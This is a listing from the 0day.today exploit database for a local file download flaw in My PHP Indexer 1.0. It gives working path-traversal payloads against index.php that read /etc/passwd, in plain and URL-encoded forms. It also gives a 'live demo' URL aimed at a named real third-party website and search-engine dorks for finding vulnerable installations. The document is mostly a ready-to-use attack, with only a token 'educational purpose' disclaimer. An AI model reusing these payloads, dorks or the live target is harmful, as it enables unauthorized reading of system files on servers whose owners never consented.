[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

My PHP Indexer 1.0 (index.php) Local File Download Vulnerability

Author
JosS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3885
Category
web applications
Date add
11-10-2008
Platform
unsorted
================================================================
My PHP Indexer 1.0 (index.php) Local File Download Vulnerability
================================================================



# My PHP Indexer 1.0 (index.php) Local File Download Vulnerability
# url: http://sourceforge.net/projects/myphpindexer/
#
# Author: JosS
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.

-----------------------------------------------
Depending the server configuration is possible 
that it doesn't allow us to scale directories.
-----------------------------------------------

vuln file: index.php

PoC:     /index.php?d=[DIR]&f=[FILE]
Exploit: /index.php?d=../../../../../../../../../../../etc/&f=passwd
         /index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/&f=passwd

live demo:
[PATH] = ../../../; (%2e%2e%2f%2e%2e%2f%2e%2e%2f)
[FILE] = index.php;
http://www.bethesda.org.sg/resources/admin/index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f&f=index.php

dork:     "Powered by My PHP Indexer 1.0"
dork (2): "priv8 :P"




#  0day.today [2024-09-28]  #